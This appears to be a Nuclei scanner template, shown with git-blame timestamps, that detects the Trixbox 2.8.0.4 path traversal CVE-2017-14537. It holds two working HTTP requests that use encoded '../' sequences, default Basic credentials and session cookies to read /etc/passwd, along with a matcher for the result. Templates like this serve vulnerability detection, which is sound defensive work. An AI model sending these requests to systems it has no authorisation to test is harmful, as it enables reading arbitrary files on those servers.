2021-01-02 05:02:50 +00:00
id : CVE-2017-14537
2020-09-04 04:26:20 +00:00
info :
2022-04-29 19:58:07 +00:00
name : Trixbox 2.8.0 - Path Traversal
2020-09-04 04:26:20 +00:00
author : pikpikcu
severity : medium
2022-05-17 09:18:12 +00:00
description : Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server.
2023-09-06 13:22:34 +00:00
remediation : |
Apply the latest security patches or upgrade to a newer version of Trixbox to mitigate this vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
2022-04-07 13:53:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-14537
2022-04-22 10:38:41 +00:00
- https://sourceforge.net/projects/asteriskathome/
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/162853/Trixbox-2.8.0.4-Path-Traversal.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-14537
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.01002
2024-01-14 13:49:27 +00:00
epss-percentile : 0.81968
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : netfortris
product : trixbox
2023-12-05 09:50:33 +00:00
tags : cve,cve2017,trixbox,lfi,packetstorm,netfortris
2020-09-04 04:26:20 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-09-04 04:26:20 +00:00
- raw :
- |
POST /maint/index.php?packages HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Referer : {{Hostname}}/maint/index.php?packages
Cookie : lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization : Basic bWFpbnQ6cGFzc3dvcmQ=
xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages
- |
GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language : en-US,en;q=0.5
Referer : {{Hostname}}/maint/index.php?packages
Cookie : lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization : Basic bWFpbnQ6cGFzc3dvcmQ=
matchers-condition : and
matchers :
- type : regex
2023-07-11 19:49:27 +00:00
part : body
2020-09-04 04:26:20 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2023-12-29 09:30:44 +00:00
# digest: 4a0a00473045022100ce798eebc2e3146f836802ce53f92d76f694ba17ff0de6da85a6da34fb64153302203847448c352b718f2bbaf5fc50b231f4442e16c21728227241168cb38bce5995:922c64590222798bb761d5b6d8e72950